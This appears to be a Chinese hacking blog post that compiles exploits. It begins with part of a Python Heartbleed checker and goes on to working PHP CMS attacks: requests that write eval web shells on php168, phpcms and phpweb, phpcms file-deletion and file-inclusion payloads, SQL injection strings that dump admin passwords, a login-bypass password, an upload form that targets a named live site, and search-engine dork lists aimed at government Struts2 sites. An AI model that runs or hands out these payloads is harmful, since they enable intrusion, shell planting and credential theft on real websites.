def recvmsg(s):

    hdr = recvall(s, 5)

    if hdr is None:

        print 'Unexpected EOF receiving record header - server closed connection'

        return None, None, None

    typ, ver, ln = struct.unpack('>BHH', hdr)

    pay = recvall(s, ln, 10)

    if pay is None:

        print 'Unexpected EOF receiving record payload - server closed connection'

        return None, None, None

    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))

    return typ, ver, pay


def hit_hb(s):

    s.send(hb)

    while True:

        typ, ver, pay = recvmsg(s)

        if typ is None:

            print 'No heartbeat response received, server likely not vulnerable'

            return False


        if typ == 24:

            print 'Received heartbeat response:'

            hexdump(pay)

            if len(pay) > 3:

                print 'WARNING: server returned more data than it should - server is vulnerable!'

            else:

                print 'Server processed malformed heartbeat, but did not return any extra data.'

            return True


        if typ == 21:

            print 'Received alert:'

            hexdump(pay)

            print 'Server returned error, likely not vulnerable'

            return False


def main():

    opts, args = options.parse_args()

    if len(args) < 1:

        options.print_help()

        return


    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    print 'Connecting...'

    sys.stdout.flush()

    s.connect((args[0], opts.port))

    print 'Sending Client Hello...'

    sys.stdout.flush()

    s.send(hello)

    print 'Waiting for Server Hello...'

    sys.stdout.flush()

    while True:

        typ, ver, pay = recvmsg(s)

        if typ == None:

            print 'Server closed connection without sending Server Hello.'

            return

        # Look for server hello done message.

        if typ == 22 and ord(pay[0]) == 0x0E:

            break


    print 'Sending heartbeat request...'

    sys.stdout.flush()

    s.send(hb)

    hit_hb(s)


if __name__ == '__main__':

    main()

------------------------------------------------------------------------------------------

php168

V6.02   

/member/post.php?only=1&showHtml_Type[bencandy][1]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}&aid=1&job=endHTML

直接在该目录生成个member/c.php 密码为c

------------------------------------------------------------------------------------------

phpcms

phpcmsv9


index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php


phpcms2008本地文件包含


phpcms本地包含类漏洞,如果该文件包含了/include/common.inc.php就可以包含执行很多后台才能执行的文件了。


由于phpcms的全局变量机制,导致能拿shell的方法很多,类似的问题不止一个。


admin/safe.inc.php文件是后台扫木马的程序,但是很可惜的是虽然文件名叫做safe,但是一点也不safe。


公布一个本地包含秒杀拿shell的方法。


包含:admin/safe.inc.php文件GET提交一下数据

将在根目录下生成一句话

用上一篇得到的密钥$key='sIpeofogblFVCildZEwe';

加密如下字符串


$evil='i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00';


http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=


将在根目录下生成一句话木马


同理任意文件删除漏洞:

$evil='i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';


http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==


--------------------------------------------------------------------------------------------

phpweb

admin' or '1'='1  万能密码

inurl:/class/?1.html


inurl:webmall/query.php?typeid=?

inurl:shop/class/?226.html

inurl:product/html/?10.html

inurl:down/class/?2.html

inurl:news/html/?417.html

inurl:shop/html/?477.html

inurl:news/class/?86.html


inurl:/page/html/?1.html

exp   /search/index.php?imageField.x=-1138&imageField.y=-319&key=1%27

inurl:class/index.php?catid=0

exp   /3149_4369/product/html/?78'and(select/**/1/**/from(select/**/count(*),concat((select/**/(select/**/(select/**/concat(0x27,0x7e,user,0x27,0x7e,password,0x27,0x7e)/**/from/**/dev_base_admin/**/limit/**/0,1))/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/*.html


关键字:inurl:down/class/index.php?myord=


后台地址:admin.php


万能密码:admin 'or '1'='1


注入地址:down/class/index.php?myord=1


关键字:inurl:webmall/detail.php?id


数据表:pwn_base_admin


关键字:inurl:webmall/detail.php?id


数据表:pwn_base_admin

 

phpWebSite搜索模块跨站脚本执行漏洞

受影响系统:


Appalachian State Universit phpWebSite 1.4.0


phpWebSite是一款网站内容管理系统(CMS)。

利用方法

index.php?module=search&user=search&search=%22%3E%3Ch1%3EXSS%3C%2Fh1%3E&alternate=local&mod_title=all&submit=Search



phpweb成品网站最新版(注入、上传、写shell)


漏洞文件:

inurl:search/module/search.php

inurl:search/index.php?key=1&myord=1 [sqlinjection]


base/install/index.php --data 

"dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"

shell地址: /config.inc.php


inurl:shop/class/index.php?showbrandid=1 


AND (SELECT 1 FROM (SELECT count( * ) , concat((SELECT concat( 0×23, user, 0x7e,password, 0×23 ) FROM dev_base_admin limit 0,1),floor( rand( 0 ) *2 ))x FROM information_schema.tables GROUP BY x)a)–%20


phpweb所有的整站程序伪静态页面都存在sql注入


主站:http://phpweb.net/

加’检测:


http://www.phpweb.net/down/html/?772′.html


出错

存在注入。

不能用空格,只能用/*罗

http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常

 

http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.

爆数据库版本:

 

?

1


http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html


phpweb iis网站管理系统kedit编辑上传

——————————————————————————————————————————————————————————

<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://www.hc-ib.net/kedit/upload_cgi/upload.php">

<input type="hidden" name="fileName" id="fileName" value="404.php.a;a.jpg" />

<input type="hidden" name="attachPath" id="fileName" value="news/pics/" />

 

<select id="imageType" onchange="javascript:parent.KindImageType(this.value);document.getElementById('KE_IMAGEsubmitButton').focus();">

<option value="1" selected="selected">本地</option>

<option value="2">远程</option>

</select>

 

<input type="text" id="imgLink" value="http://" maxlength="255" style="width:95%;border:1px solid #555555;display:none;" />

<input type="file" name="fileData" id="imgFile" size="14" style="border:1px solid #555555;" onclick="javascript:document.getElementById('imgLink').value='http://';" /></td>

 

<input type="text" name="imgTitle" id="imgTitle" value="" maxlength="100" style="width:95%;border:1px solid #555555;" />

<input type="text" name="imgWidth" id="imgWidth" value="0" maxlength="4" style="width:40px;border:1px solid #555555;" />

<input type="text" name="imgHeight" id="imgHeight" value="0" maxlength="4" style="width:40px;border:1px solid #555555;" />

<input type="text" name="imgBorder" id="imgBorder" value="0" maxlength="1" style="width:20px;border:1px solid #555555;" />

<select id="imgAlign" name="imgAlign">

<option value="">对齐方式</option>

<option value="baseline">baseline</option>

<option value="top">top</option>

<option value="middle">middle</option>

<option value="bottom">bottom</option>

<option value="texttop">texttop</option>

<option value="absmiddle">absmiddle</option>

<option value="absbottom">absbottom</option>

<option value="left">left</option>

<option value="right">right</option>

</select>

<input type="text" name="imgHspace" id="imgHspace" value="0" maxlength="1" style="width:20px;border:1px solid #555555;" />

<input type="text" name="imgVspace" id="imgVspace" value="0" maxlength="1" style="width:20px;border:1px solid #555555;" />

<input type="submit" name="button" id="KE_IMAGEsubmitButton" value="确定" style="border:1px solid #555555;background-color:#AAAAAA;" /></form>


上传以后只需要右键查看源代码即可得到上传后的地址

上面的部分是直接从编辑器上面拷贝修改的,其实还可以这样的:


<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://www.hc-ib.net/kedit/upload_cgi/upload.php">

<input type="text" name="fileName" value="404.php.a;a.jpg" />

<input type="hidden" name="attachPath" value="news/pics/" />

<input type="file" name="fileData" size="14" /></td>

<input type="submit" name="button" value="确定" />

</form> 

---------------------------------------------------------------------------------------------

struts2

关键词

intitle:客户管理平台 inurl:action


intitle:广东 inurl:detail.action


intitle:广东 inurl:Login.action


intitle:电视台 inurl:login.action


intitle:平台 inurl:login.action


intitle:车管所 filetype:action


intitle:网络电视台 inurl:action


intitle:车管所 inurl:action?id=


intitle:车管所 filetype:action


inurl:车管所 inurl:action


inurl:车管所 filetype:action


inurl:action  site:gov.cn


Inurl:index.action 


inurl:车管所 inurl:action?id=


Inurl:index.achtion 标题:apache struts2


filetype:action  site:gov.cn


filetype inurl:action site:jp


Inurl:index.action    site: tw Inurl:index.action


诗人博客 www.BlueNoob.com


Inurl:商城.achtion (商城比较多)


Inurl:index.achtion 标题:apache struts2


Inurl:action?id=

 

site:tw inurl:action


site:jp inurl:action


site:ko inurl:action


filetype:action site:jp


filetype:action site:fas.org   查美国的


filetype:action site:gov.随便哪个国家的缩写


filetype:action site:edu.cn   


--------------------------------------------------------------------------------------


评论

热度(1)